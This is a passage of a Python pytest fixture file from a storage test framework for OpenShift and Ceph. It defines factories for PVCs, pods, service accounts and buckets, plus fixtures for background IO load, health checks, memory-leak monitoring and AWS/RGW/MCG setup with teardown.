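# pvc_factory; the status wait and teardown are handled by the factory above.
#
#     def test_with_pod(pvc_factory, pod_factory):
#         pvc_obj = pvc_factory(interface=constants.CEPHFILESYSTEM)
#         pod_obj = pod_factory(interface=constants.CEPHFILESYSTEM, pvc=pvc_obj)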
@pytest.fixture(scope="class")
def teardown_factory_class(request):
return teardown_factory_fixture(request)
@pytest.fixture(scope="session")
def teardown_factory_session(request):
return teardown_factory_fixture(request)
@pytest.fixture(scope="function")
def teardown_factory(request):
return teardown_factory_fixture(request)
def teardown_factory_fixture(request):
"""
Tearing down a resource that was created during the test
To use this factory, you'll need to pass 'teardown_factory' to your test
function and call it in your test when a new resource is created and you
want it to be removed in the teardown phase:
def test_example(self, teardown_factory):
pvc_obj = create_pvc()
teardown_factory(pvc_obj)
"""
instances = []
def factory(resource_obj):
"""
Args:
resource_obj (OCS object or list of OCS objects) : Object to teardown after the test
"""
if isinstance(resource_obj, list):
instances.extend(resource_obj)
else:
instances.append(resource_obj)
def finalizer():
"""
Delete the resources created in the test
"""
for instance in instances[::-1]:
if not instance.is_deleted:
reclaim_policy = (
instance.reclaim_policy if instance.kind == constants.PVC else None
)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
if reclaim_policy == constants.RECLAIM_POLICY_DELETE:
helpers.validate_pv_delete(instance.backed_pv)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def service_account_factory_class(request):
return service_account_factory_fixture(request)
@pytest.fixture(scope="session")
def service_account_factory_session(request):
return service_account_factory_fixture(request)
@pytest.fixture(scope="function")
def service_account_factory(request):
return service_account_factory_fixture(request)
def service_account_factory_fixture(request):
"""
Create a service account
"""
instances = []
active_service_account_obj = None
def factory(project=None, service_account=None):
"""
Args:
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
service_account (str): service_account_name
Returns:
object: serviceaccount instance.
"""
nonlocal active_service_account_obj
if active_service_account_obj and not service_account:
return active_service_account_obj
elif service_account:
sa_obj = helpers.get_serviceaccount_obj(
sa_name=service_account, namespace=project.namespace
)
if not helpers.validate_scc_policy(
sa_name=service_account, namespace=project.namespace
):
helpers.add_scc_policy(
sa_name=service_account, namespace=project.namespace
)
sa_obj.project = project
active_service_account_obj = sa_obj
instances.append(sa_obj)
return sa_obj
else:
sa_obj = helpers.create_serviceaccount(
namespace=project.namespace,
)
sa_obj.project = project
active_service_account_obj = sa_obj
helpers.add_scc_policy(sa_name=sa_obj.name, namespace=project.namespace)
assert sa_obj, "Failed to create serviceaccount"
instances.append(sa_obj)
return sa_obj
def finalizer():
"""
Delete the service account
"""
for instance in instances:
helpers.remove_scc_policy(
sa_name=instance.name, namespace=instance.namespace
)
instance.delete()
instance.ocp.wait_for_delete(resource_name=instance.name)
request.addfinalizer(finalizer)
return factory
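# Usage sketch (illustrative only): create a service account inside a project
# from project_factory; SCC policy handling and cleanup are done by the
# factory above.
#
#     def test_with_sa(project_factory, service_account_factory):
#         proj = project_factory()
#         sa_obj = service_account_factory(project=proj)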
@pytest.fixture()
def dc_pod_factory(request, pvc_factory, service_account_factory):
"""
Create deploymentconfig pods
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
pvc=None,
service_account=None,
size=None,
custom_data=None,
node_name=None,
node_selector=None,
replica_count=1,
raw_block_pv=False,
sa_obj=None,
wait=True,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
pvc (PVC object): ocs_ci.ocs.resources.pvc.PVC instance kind.
service_account (str): service account name for dc_pods
size (int): The requested size for the PVC
custom_data (dict): If provided then Pod object is created
by using these data. Parameter `pvc` is not used but reference
is set if provided.
node_name (str): The name of specific node to schedule the pod
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
replica_count (int): Replica count for deployment config
raw_block_pv (bool): True if the pod uses a raw block PVC
sa_obj (object) : If specific service account is needed
"""
if custom_data:
dc_pod_obj = helpers.create_resource(**custom_data)
else:
pvc = pvc or pvc_factory(interface=interface, size=size)
sa_obj = sa_obj or service_account_factory(
project=pvc.project, service_account=service_account
)
dc_pod_obj = helpers.create_pod(
interface_type=interface,
pvc_name=pvc.name,
do_reload=False,
namespace=pvc.namespace,
sa_name=sa_obj.name,
dc_deployment=True,
replica_count=replica_count,
node_name=node_name,
node_selector=node_selector,
raw_block_pv=raw_block_pv,
pod_dict_path=constants.FEDORA_DC_YAML,
)
instances.append(dc_pod_obj)
log.info(dc_pod_obj.name)
if wait:
helpers.wait_for_resource_state(
dc_pod_obj, constants.STATUS_RUNNING, timeout=180
)
dc_pod_obj.pvc = pvc
return dc_pod_obj
def finalizer():
"""
Delete dc pods
"""
for instance in instances:
delete_deploymentconfig_pods(instance)
request.addfinalizer(finalizer)
return factory
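# Usage sketch (illustrative only, sizes are arbitrary): create a
# DeploymentConfig based pod with two replicas on a 5 GiB RBD PVC.
#
#     def test_with_dc_pod(dc_pod_factory):
#         dc_pod = dc_pod_factory(size=5, replica_count=2)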
@pytest.fixture(scope="session", autouse=True)
def polarion_testsuite_properties(record_testsuite_property, pytestconfig):
"""
Configures polarion testsuite properties for junit xml
"""
polarion_project_id = config.REPORTING["polarion"]["project_id"]
record_testsuite_property("polarion-project-id", polarion_project_id)
jenkins_build_url = config.RUN.get("jenkins_build_url")
if jenkins_build_url:
record_testsuite_property("polarion-custom-description", jenkins_build_url)
polarion_testrun_name = get_testrun_name()
record_testsuite_property("polarion-testrun-id", polarion_testrun_name)
record_testsuite_property("polarion-testrun-status-id", "inprogress")
record_testsuite_property("polarion-custom-isautomated", "True")
@pytest.fixture(scope="session", autouse=True)
def additional_testsuite_properties(record_testsuite_property, pytestconfig):
"""
Configures additional custom testsuite properties for junit xml
"""
# add logs url
logs_url = config.RUN.get("logs_url")
if logs_url:
record_testsuite_property("logs-url", logs_url)
@pytest.fixture(scope="session")
def tier_marks_name():
"""
Gets the tier mark names
Returns:
list: list of tier mark names
"""
tier_marks_name = []
for each_tier in tier_marks:
try:
tier_marks_name.append(each_tier.name)
except AttributeError:
tier_marks_name.append(each_tier().args[0].name)
return tier_marks_name
@pytest.fixture(scope="function", autouse=True)
def health_checker(request, tier_marks_name):
skipped = False
dev_mode = config.RUN["cli_params"].get("dev_mode")
if dev_mode:
log.info("Skipping health checks for development mode")
return
def finalizer():
if not skipped:
try:
teardown = config.RUN["cli_params"]["teardown"]
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
if not (teardown or skip_ocs_deployment):
ceph_health_check_base()
log.info("Ceph health check passed at teardown")
except CephHealthException:
log.info("Ceph health check failed at teardown")
# Retrying to increase the chance the cluster health will be OK
# for next test
ceph_health_check()
raise
node = request.node
request.addfinalizer(finalizer)
for mark in node.iter_markers():
if mark.name in tier_marks_name:
log.info("Checking for Ceph Health OK ")
try:
status = ceph_health_check_base()
if status:
log.info("Ceph health check passed at setup")
return
except CephHealthException:
skipped = True
# skip because ceph is not in good health
pytest.skip("Ceph health check failed at setup")
@pytest.fixture(scope="session", autouse=True)
def cluster(request, log_cli_level):
"""
This fixture initiates deployment for both OCP and OCS clusters.
Specific platform deployment classes will handle the fine details
of action
"""
log.info(f"All logs located at {ocsci_log_path()}")
teardown = config.RUN["cli_params"]["teardown"]
deploy = config.RUN["cli_params"]["deploy"]
if teardown or deploy:
factory = dep_factory.DeploymentFactory()
deployer = factory.get_deployment()
# Add a finalizer to teardown the cluster after test execution is finished
if teardown:
def cluster_teardown_finalizer():
# If KMS is configured, clean up the backend resources
# we are doing it before OCP cleanup
if config.DEPLOYMENT.get("kms_deployment"):
kms = KMS.get_kms_deployment()
kms.cleanup()
deployer.destroy_cluster(log_cli_level)
request.addfinalizer(cluster_teardown_finalizer)
log.info("Will teardown cluster because --teardown was provided")
# Download client
force_download = (
config.RUN["cli_params"].get("deploy")
and config.DEPLOYMENT["force_download_client"]
)
get_openshift_client(force_download=force_download)
# set environment variable for early testing of RHCOS
if config.ENV_DATA.get("early_testing"):
release_img = config.ENV_DATA["RELEASE_IMG"]
log.info(f"Running early testing of RHCOS with release image: {release_img}")
os.environ["RELEASE_IMG"] = release_img
os.environ["OPENSHIFT_INSTALL_RELEASE_IMAGE_OVERRIDE"] = release_img
if deploy:
# Deploy cluster
deployer.deploy_cluster(log_cli_level)
@pytest.fixture(scope="class")
def environment_checker(request):
node = request.node
# List of marks for which we will ignore the leftover checker
marks_to_ignore = [m.mark for m in [deployment, ignore_leftovers]]
# app labels of resources to be excluded for leftover check
exclude_labels = [constants.must_gather_pod_label]
for mark in node.iter_markers():
if mark in marks_to_ignore:
return
if mark.name == ignore_leftover_label.name:
exclude_labels.extend(list(mark.args))
request.addfinalizer(
partial(get_status_after_execution, exclude_labels=exclude_labels)
)
get_status_before_execution(exclude_labels=exclude_labels)
@pytest.fixture(scope="session")
def log_cli_level(pytestconfig):
"""
Retrieves the log_cli_level set in pytest.ini
Returns:
str: log_cli_level set in pytest.ini or DEBUG if not set
"""
return pytestconfig.getini("log_cli_level") or "DEBUG"
@pytest.fixture(scope="session", autouse=True)
def cluster_load(
request,
project_factory_session,
pvc_factory_session,
service_account_factory_session,
pod_factory_session,
):
"""
Run IO during the test execution
"""
cl_load_obj = None
io_in_bg = config.RUN.get("io_in_bg")
log_utilization = config.RUN.get("log_utilization")
io_load = config.RUN.get("io_load")
cluster_load_error = None
cluster_load_error_msg = (
"Cluster load might not work correctly during this run, because "
"it failed with an exception: %s"
)
# IO load should not happen during deployment
deployment_test = "deployment" in request.node.items[0].location[0]
if io_in_bg and not deployment_test:
io_load = int(io_load) * 0.01
log.info(wrap_msg("Tests will be running while IO is in the background"))
log.info(
"Start running IO in the background. The amount of IO that "
"will be written is going to be determined by the cluster "
"capabilities according to its limit"
)
try:
cl_load_obj = ClusterLoad(
project_factory=project_factory_session,
sa_factory=service_account_factory_session,
pvc_factory=pvc_factory_session,
pod_factory=pod_factory_session,
target_percentage=io_load,
)
cl_load_obj.reach_cluster_load_percentage()
except Exception as ex:
log.error(cluster_load_error_msg, ex)
cluster_load_error = ex
if (log_utilization or io_in_bg) and not deployment_test:
if not cl_load_obj:
try:
cl_load_obj = ClusterLoad()
except Exception as ex:
log.error(cluster_load_error_msg, ex)
cluster_load_error = ex
config.RUN["load_status"] = "running"
def finalizer():
"""
Stop the thread that executed watch_load()
"""
config.RUN["load_status"] = "finished"
if thread:
thread.join()
if cluster_load_error:
raise cluster_load_error
request.addfinalizer(finalizer)
def watch_load():
"""
Watch the cluster load by monitoring the cluster latency.
Print the cluster utilization metrics every 20 seconds.
If IOs are running in the test background, dynamically adjust
the IO load based on the cluster latency.
"""
while config.RUN["load_status"] != "finished":
time.sleep(20)
try:
cl_load_obj.print_metrics(mute_logs=True)
if io_in_bg:
if config.RUN["load_status"] == "running":
cl_load_obj.adjust_load_if_needed()
elif config.RUN["load_status"] == "to_be_paused":
cl_load_obj.reduce_load(pause=True)
config.RUN["load_status"] = "paused"
elif config.RUN["load_status"] == "to_be_reduced":
cl_load_obj.reduce_load(pause=False)
config.RUN["load_status"] = "reduced"
elif config.RUN["load_status"] == "to_be_resumed":
cl_load_obj.resume_load()
config.RUN["load_status"] = "running"
# Any type of exception should be caught and we should continue.
# We don't want any test to fail
except Exception:
continue
thread = threading.Thread(target=watch_load)
thread.start()
def resume_cluster_load_implementation():
"""
Resume cluster load implementation
"""
config.RUN["load_status"] = "to_be_resumed"
try:
for load_status in TimeoutSampler(300, 3, config.RUN.get, "load_status"):
if load_status == "running":
break
except TimeoutExpiredError:
log.error("Cluster load was not resumed successfully")
def reduce_cluster_load_implementation(request, pause, resume=True):
"""
Pause/reduce the background cluster load
Args:
pause (bool): True for completely pausing the cluster load, False for reducing it by 50%
resume (bool): True for resuming the cluster load upon teardown, False for not resuming
"""
if config.RUN.get("io_in_bg"):
def finalizer():
"""
Resume the cluster load
"""
if resume:
resume_cluster_load_implementation()
request.addfinalizer(finalizer)
config.RUN["load_status"] = "to_be_paused" if pause else "to_be_reduced"
try:
for load_status in TimeoutSampler(300, 3, config.RUN.get, "load_status"):
if load_status in ["paused", "reduced"]:
break
except TimeoutExpiredError:
log.error(
f"Cluster load was not {'paused' if pause else 'reduced'} successfully"
)
@pytest.fixture()
def pause_cluster_load(request):
"""
Pause the background cluster load without resuming it
"""
reduce_cluster_load_implementation(request=request, pause=True, resume=False)
@pytest.fixture()
def resume_cluster_load(request):
"""
Resume the background cluster load
"""
if config.RUN.get("io_in_bg"):
def finalizer():
"""
Resume the cluster load
"""
resume_cluster_load_implementation()
request.addfinalizer(finalizer)
@pytest.fixture()
def pause_and_resume_cluster_load(request):
"""
Pause the background cluster load and resume it in teardown to the original load value
"""
reduce_cluster_load_implementation(request=request, pause=True)
@pytest.fixture()
def reduce_and_resume_cluster_load(request):
"""
Reduce the background cluster load to be 50% of what it is and resume the load in teardown
to the original load value
"""
reduce_cluster_load_implementation(request=request, pause=False)
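# Usage sketch (illustrative only): a disruptive test just requests one of the
# fixtures above; no direct call is needed, the background load is adjusted
# during setup and restored (or not) in teardown according to the fixture used.
#
#     def test_disruptive_operation(pause_and_resume_cluster_load):
#         ...  # background IO is paused for the duration of this test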
@pytest.fixture(
params=[
pytest.param({"interface": constants.CEPHBLOCKPOOL}),
pytest.param({"interface": constants.CEPHFILESYSTEM}),
],
ids=["RBD", "CephFS"],
)
def interface_iterate(request):
"""
Iterate over interfaces - CephBlockPool and CephFileSystem
"""
return request.param["interface"]
@pytest.fixture(scope="class")
def multi_pvc_factory_class(project_factory_class, pvc_factory_class):
return multi_pvc_factory_fixture(project_factory_class, pvc_factory_class)
@pytest.fixture(scope="session")
def multi_pvc_factory_session(project_factory_session, pvc_factory_session):
return multi_pvc_factory_fixture(project_factory_session, pvc_factory_session)
@pytest.fixture(scope="function")
def multi_pvc_factory(project_factory, pvc_factory):
return multi_pvc_factory_fixture(project_factory, pvc_factory)
def multi_pvc_factory_fixture(project_factory, pvc_factory):
"""
Create a Persistent Volume Claims factory. Calling this fixture creates a
set of new PVCs. Options for PVC creation based on provided access modes:
1. For each PVC, choose random value from the list of access modes
2. Create PVCs based on the specified distribution number of access modes.
Create sets of PVCs based on the order of access modes.
3. Create PVCs based on the specified distribution number of access modes.
The order of PVC creation is independent of access mode.
"""
def factory(
interface=constants.CEPHBLOCKPOOL,
project=None,
storageclass=None,
size=None,
access_modes=None,
access_modes_selection="distribute_sequential",
access_mode_dist_ratio=None,
status=constants.STATUS_BOUND,
num_of_pvc=1,
wait_each=False,
timeout=60,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
storageclass (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'StorageClass' kind.
size (int): The requested size for the PVC
access_modes (list): List of access modes. One of the access modes
will be chosen for creating each PVC. If not specified,
ReadWriteOnce will be selected for all PVCs. To specify
volume mode, append volume mode in the access mode name
separated by '-'.
eg: ['ReadWriteOnce', 'ReadOnlyMany', 'ReadWriteMany',
'ReadWriteMany-Block']
access_modes_selection (str): Decides how to select accessMode for
each PVC from the options given in 'access_modes' list.
Values are 'select_random', 'distribute_random' and 'distribute_sequential'.
'select_random' : While creating each PVC, one access mode will
be selected from the 'access_modes' list.
'distribute_random' : The access modes in the list
'access_modes' will be distributed based on the values in
'distribute_ratio' and the order in which PVCs are created
will not be based on the access modes. For example, 1st and
6th PVC might have same access mode.
'distribute_sequential' : The access modes in the list
'access_modes' will be distributed based on the values in
'distribute_ratio' and the order in which PVCs are created
will be as sets of PVCs of same access mode. For example,
first set of 10 will be having same access mode followed by
next set of 13 with a different access mode.
access_mode_dist_ratio (list): Contains the number of PVCs to be
created for each access mode. If not specified, the given list
of access modes will be equally distributed among the PVCs.
eg: [10,12] for num_of_pvc=22 and
access_modes=['ReadWriteOnce', 'ReadWriteMany']
status (str): If provided then factory waits for object to reach
desired state.
num_of_pvc(int): Number of PVCs to be created
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
timeout(int): Time in seconds to wait
Returns:
list: objects of PVC class.
"""
pvc_list = []
if wait_each:
status_tmp = status
else:
status_tmp = ""
project = project or project_factory()
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
access_modes = access_modes or [constants.ACCESS_MODE_RWO]
access_modes_list = []
if access_modes_selection == "select_random":
for _ in range(num_of_pvc):
mode = random.choice(access_modes)
access_modes_list.append(mode)
else:
if not access_mode_dist_ratio:
num_of_modes = len(access_modes)
dist_val = floor(num_of_pvc / num_of_modes)
access_mode_dist_ratio = [dist_val] * num_of_modes
access_mode_dist_ratio[-1] = dist_val + (num_of_pvc % num_of_modes)
zipped_share = list(zip(access_modes, access_mode_dist_ratio))
for mode, share in zipped_share:
access_modes_list.extend([mode] * share)
if access_modes_selection == "distribute_random":
random.shuffle(access_modes_list)
for access_mode in access_modes_list:
if "-" in access_mode:
access_mode, volume_mode = access_mode.split("-")
else:
volume_mode = ""
pvc_obj = pvc_factory(
interface=interface,
project=project,
storageclass=storageclass,
size=size,
access_mode=access_mode,
status=status_tmp,
volume_mode=volume_mode,
)
pvc_list.append(pvc_obj)
pvc_obj.project = project
if status and not wait_each:
for pvc_obj in pvc_list:
helpers.wait_for_resource_state(pvc_obj, status, timeout=timeout)
return pvc_list
return factory
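# Worked example (illustrative only), matching the numbers in the docstring
# above: with num_of_pvc=22, access_modes=['ReadWriteOnce', 'ReadWriteMany']
# and access_mode_dist_ratio=[10, 12], the default 'distribute_sequential'
# selection creates the first 10 PVCs as RWO and the remaining 12 as RWX.
#
#     def test_with_many_pvcs(multi_pvc_factory):
#         pvc_objs = multi_pvc_factory(
#             interface=constants.CEPHFILESYSTEM,
#             access_modes=["ReadWriteOnce", "ReadWriteMany"],
#             access_mode_dist_ratio=[10, 12],
#             num_of_pvc=22,
#         )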
@pytest.fixture(scope="function")
def memory_leak_function(request):
"""
Function to start Memory leak thread which will be executed parallel with test run
Memory leak data will be captured in all worker nodes for ceph-osd process
Data will be appended in /tmp/(worker)-top-output.txt file for each worker
During teardown created tmp files will be deleted
Usage:
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_fun will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
def finalizer():
"""
Finalizer to stop memory leak data capture thread and cleanup the files
"""
set_flag_status("terminated")
try:
for status in TimeoutSampler(90, 3, get_flag_status):
if status == "terminated":
break
except TimeoutExpiredError:
log.warning(
"Background test execution still in progress before"
"memory leak thread terminated"
)
if thread:
thread.join()
log_path = ocsci_log_path()
for worker in node.get_worker_nodes():
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
copyfile(
f"/tmp/{worker}-top-output.txt",
f"{log_path}/{worker}-top-output.txt",
)
os.remove(f"/tmp/{worker}-top-output.txt")
log.info("Memory leak capture has stopped")
request.addfinalizer(finalizer)
temp_file = tempfile.NamedTemporaryFile(
mode="w+", prefix="test_status", delete=False
)
def get_flag_status():
with open(temp_file.name, "r") as t_file:
return t_file.readline()
def set_flag_status(value):
with open(temp_file.name, "w") as t_file:
t_file.writelines(value)
set_flag_status("running")
def run_memory_leak_in_bg():
"""
Function to run memory leak in background thread
Memory leak data is written in below format
date time PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
"""
oc = ocp.OCP(namespace=config.ENV_DATA["cluster_namespace"])
while get_flag_status() == "running":
for worker in node.get_worker_nodes():
filename = f"/tmp/{worker}-top-output.txt"
top_cmd = f"debug nodes/{worker} -- chroot /host top -n 2 b"
with open("/tmp/file.txt", "w+") as temp:
temp.write(
str(oc.exec_oc_cmd(command=top_cmd, out_yaml_format=False))
)
temp.seek(0)
for line in temp:
if line.__contains__("ceph-osd"):
with open(filename, "a+") as f:
f.write(str(datetime.now()))
f.write(" ")
f.write(line)
log.info("Start memory leak data capture in the test background")
thread = threading.Thread(target=run_memory_leak_in_bg)
thread.start()
@pytest.fixture()
def aws_obj():
"""
Initialize AWS instance
Returns:
AWS: An instance of AWS class
"""
aws_obj = aws.AWS()
return aws_obj
@pytest.fixture()
def ec2_instances(request, aws_obj):
"""
Get cluster instances
Returns:
dict: The ID keys and the name values of the instances
"""
# Get all cluster nodes objects
nodes = node.get_node_objs()
# Get the cluster nodes ec2 instances
ec2_instances = aws.get_instances_ids_and_names(nodes)
assert (
ec2_instances
), f"Failed to get ec2 instances for node {[n.name for n in nodes]}"
def finalizer():
"""
Make sure all instances are running
"""
# Getting the instances that are in status 'stopping' (if there are any), to wait for them to
# get to status 'stopped' so it will be possible to start them
stopping_instances = {
key: val
for key, val in ec2_instances.items()
if (aws_obj.get_instances_status_by_id(key) == constants.INSTANCE_STOPPING)
}
# Waiting for the instances that are in status 'stopping'
# (if there are any) to reach 'stopped'
if stopping_instances:
for stopping_instance in stopping_instances:
# iterating over the dict yields the instance IDs (its keys)
instance = aws_obj.get_ec2_instance(stopping_instance)
instance.wait_until_stopped()
stopped_instances = {
key: val
for key, val in ec2_instances.items()
if (aws_obj.get_instances_status_by_id(key) == constants.INSTANCE_STOPPED)
}
# Start the instances
if stopped_instances:
aws_obj.start_ec2_instances(instances=stopped_instances, wait=True)
request.addfinalizer(finalizer)
return ec2_instances
@pytest.fixture(scope="session")
def cld_mgr(request, rgw_endpoint):
"""
Returns a cloud manager instance that'll be used throughout the session
Returns:
CloudManager: A CloudManager resource
"""
cld_mgr = CloudManager()
def finalizer():
for client in vars(cld_mgr):
try:
getattr(cld_mgr, client).secret.delete()
except AttributeError:
log.info(f"{client} secret not found")
request.addfinalizer(finalizer)
return cld_mgr
@pytest.fixture()
def rgw_obj(request):
return rgw_obj_fixture(request)
@pytest.fixture(scope="session")
def rgw_obj_session(request):
return rgw_obj_fixture(request)
def rgw_obj_fixture(request):
"""
Returns an RGW resource that represents RGW in the cluster
Returns:
RGW: An RGW resource
"""
rgw_deployments = get_deployments_having_label(
label=constants.RGW_APP_LABEL, namespace=config.ENV_DATA["cluster_namespace"]
)
if rgw_deployments:
return RGW()
else:
return None
@pytest.fixture()
def rgw_deployments(request):
"""
Return RGW deployments or skip the test.
"""
rgw_deployments = get_deployments_having_label(
label=constants.RGW_APP_LABEL, namespace=config.ENV_DATA["cluster_namespace"]
)
if rgw_deployments:
return rgw_deployments
else:
pytest.skip("There is no RGW deployment available for this test.")
@pytest.fixture(scope="session")
def rgw_endpoint(request):
"""
Expose RGW service and return external RGW endpoint address if available.
Returns:
string: external RGW endpoint
"""
log.info("Looking for RGW service to expose")
oc = ocp.OCP(kind=constants.SERVICE, namespace=config.ENV_DATA["cluster_namespace"])
rgw_service = oc.get(selector=constants.RGW_APP_LABEL)["items"]
if rgw_service:
if config.DEPLOYMENT["external_mode"]:
rgw_service = constants.RGW_SERVICE_EXTERNAL_MODE
else:
rgw_service = constants.RGW_SERVICE_INTERNAL_MODE
log.info(f"Service {rgw_service} found and will be exposed")
# custom hostname is provided because default hostname from rgw service
# is too long and OCP rejects it
oc = ocp.OCP(
kind=constants.ROUTE, namespace=config.ENV_DATA["cluster_namespace"]
)
route = oc.get(resource_name="noobaa-mgmt")
router_hostname = route["status"]["ingress"][0]["routerCanonicalHostname"]
rgw_hostname = f"rgw.{router_hostname}"
oc.exec_oc_cmd(f"expose service/{rgw_service} --hostname {rgw_hostname}")
# new route is named after service
rgw_endpoint = oc.get(resource_name=rgw_service)
endpoint_obj = OCS(**rgw_endpoint)
def _finalizer():
endpoint_obj.delete()
request.addfinalizer(_finalizer)
return f"http://{rgw_hostname}"
else:
log.info("RGW service is not available")
@pytest.fixture()
def mcg_obj(request):
return mcg_obj_fixture(request)
@pytest.fixture(scope="session")
def mcg_obj_session(request):
return mcg_obj_fixture(request)
def mcg_obj_fixture(request, *args, **kwargs):
"""
Returns an MCG resource that's connected to the S3 endpoint
Returns:
MCG: An MCG resource
"""
if config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM:
log.warning("As openshift dedicated is used, no MCG resource is returned")
return None
mcg_obj = MCG(*args, **kwargs)
def finalizer():
if config.ENV_DATA["platform"].lower() == "aws":
mcg_obj.cred_req_obj.delete()
if kwargs.get("create_aws_creds"):
request.addfinalizer(finalizer)
return mcg_obj
@pytest.fixture()
def awscli_pod(request):
return awscli_pod_fixture(request, scope_name="function")
@pytest.fixture(scope="session")
def awscli_pod_session(request):
return awscli_pod_fixture(request, scope_name="session")
def awscli_pod_fixture(request, scope_name):
"""
Creates a new AWSCLI pod for relaying commands
Args:
scope_name (str): The name of the fixture's scope,
used for giving a descriptive name to the pod and configmap
Returns:
pod: A pod running the AWS CLI
"""
# Create the service-ca configmap to be mounted upon pod creation
service_ca_data = templating.load_yaml(constants.AWSCLI_SERVICE_CA_YAML)
service_ca_configmap_name = create_unique_resource_name(
constants.AWSCLI_SERVICE_CA_CONFIGMAP_NAME, scope_name
)
service_ca_data["metadata"]["name"] = service_ca_configmap_name
log.info("Trying to create the AWS CLI service CA")
service_ca_configmap = helpers.create_resource(**service_ca_data)
arch = get_system_architecture()
if arch.startswith("x86"):
pod_dict_path = constants.AWSCLI_POD_YAML
else:
pod_dict_path = constants.AWSCLI_MULTIARCH_POD_YAML
awscli_pod_dict = templating.load_yaml(pod_dict_path)
awscli_pod_dict["spec"]["volumes"][0]["configMap"][
"name"
] = service_ca_configmap_name
awscli_pod_name = create_unique_resource_name(
constants.AWSCLI_RELAY_POD_NAME, scope_name
)
awscli_pod_dict["metadata"]["name"] = awscli_pod_name
update_container_with_mirrored_image(awscli_pod_dict)
awscli_pod_obj = Pod(**awscli_pod_dict)
assert awscli_pod_obj.create(
do_reload=True
), f"Failed to create Pod {awscli_pod_name}"
OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE, kind="ConfigMap").wait_for_resource(
resource_name=service_ca_configmap.name, column="DATA", condition="1"
)
helpers.wait_for_resource_state(awscli_pod_obj, constants.STATUS_RUNNING)
def _awscli_pod_cleanup():
awscli_pod_obj.delete()
service_ca_configmap.delete()
request.addfinalizer(_awscli_pod_cleanup)
return awscli_pod_obj
@pytest.fixture()
def nodes():
"""
Return an instance of the relevant platform nodes class
(e.g. AWSNodes, VMWareNodes) to be later used in the test
for nodes related operations, like nodes restart,
detach/attach volume, etc.
"""
factory = platform_nodes.PlatformNodesFactory()
nodes = factory.get_nodes_platform()
return nodes
@pytest.fixture()
def uploaded_objects(request, mcg_obj, awscli_pod, verify_rgw_restart_count):
return uploaded_objects_fixture(
request, mcg_obj, awscli_pod, verify_rgw_restart_count
)
@pytest.fixture(scope="session")
def uploaded_objects_session(
request, mcg_obj_session, awscli_pod_session, verify_rgw_restart_count_session
):
return uploaded_objects_fixture(
request, mcg_obj_session, awscli_pod_session, verify_rgw_restart_count_session
)
def uploaded_objects_fixture(request, mcg_obj, awscli_pod, verify_rgw_restart_count):
"""
Deletes all objects that were created as part of the test
Args:
mcg_obj (MCG): An MCG object containing the MCG S3 connection
credentials
awscli_pod (Pod): A pod running the AWSCLI tools
Returns:
list: An empty list of objects
"""
uploaded_objects_paths = []
def object_cleanup():
for uploaded_filename in uploaded_objects_paths:
log.info(f"Deleting object {uploaded_filename}")
awscli_pod.exec_cmd_on_pod(
command=craft_s3_command("rm " + uploaded_filename, mcg_obj),
secrets=[
mcg_obj.access_key_id,
mcg_obj.access_key,
mcg_obj.s3_internal_endpoint,
],
)
request.addfinalizer(object_cleanup)
return uploaded_objects_paths
@pytest.fixture()
def verify_rgw_restart_count(request):
return verify_rgw_restart_count_fixture(request)
@pytest.fixture(scope="session")
def verify_rgw_restart_count_session(request):
return verify_rgw_restart_count_fixture(request)
def verify_rgw_restart_count_fixture(request):
"""
Verifies the RGW restart count at start and end of a test
"""
if config.ENV_DATA["platform"].lower() in constants.ON_PREM_PLATFORMS:
log.info("Getting RGW pod restart count before executing the test")
initial_counts = get_rgw_restart_counts()
def finalizer():
rgw_pods = get_rgw_pods()
for rgw_pod in rgw_pods:
rgw_pod.reload()
log.info("Verifying whether RGW pods changed after executing the test")
for rgw_pod in rgw_pods:
assert rgw_pod.restart_count in initial_counts, "RGW pod restarted"
request.addfinalizer(finalizer)
@pytest.fixture()
def rgw_bucket_factory(request, rgw_obj):
if rgw_obj:
return bucket_factory_fixture(request, rgw_obj=rgw_obj)
else:
return None
@pytest.fixture(scope="session")
def rgw_bucket_factory_session(request, rgw_obj_session):
if rgw_obj_session:
return bucket_factory_fixture(request, rgw_obj=rgw_obj_session)
else:
return None
@pytest.fixture()
def bucket_factory(request, bucket_class_factory, mcg_obj):
"""
Returns an MCG bucket factory.
If MCG object not found returns None
"""
if mcg_obj:
return bucket_factory_fixture(request, bucket_class_factory, mcg_obj)
else:
return None
@pytest.fixture(scope="session")
def bucket_factory_session(request, bucket_class_factory_session, mcg_obj_session):
"""
Returns a session-scoped MCG bucket factory.
If session-scoped MCG object not found returns None
"""
if mcg_obj_session:
return bucket_factory_fixture(
request, bucket_class_factory_session, mcg_obj_session
)
else:
return None
def bucket_factory_fixture(
request, bucket_class_factory=None, mcg_obj=None, rgw_obj=None
):
"""
Create a bucket factory. Calling this fixture creates a new bucket(s).
For a custom amount, provide the 'amount' parameter.
***Please note***
Creation of buckets by utilizing the S3 interface *does not* support bucketclasses.
Only OC/CLI buckets can support different bucketclasses.
By default, all S3 buckets utilize the default bucketclass.
Args:
bucket_class_factory: creates a new Bucket Class
mcg_obj (MCG): An MCG object containing the MCG S3 connection
credentials
rgw_obj (RGW): An RGW object
"""
created_buckets = []
def _create_buckets(
amount=1,
interface="S3",
verify_health=True,
bucketclass=None,
*args,
**kwargs,
):
"""
Creates the requested amount of buckets; all created buckets are deleted by the cleanup finalizer at teardown
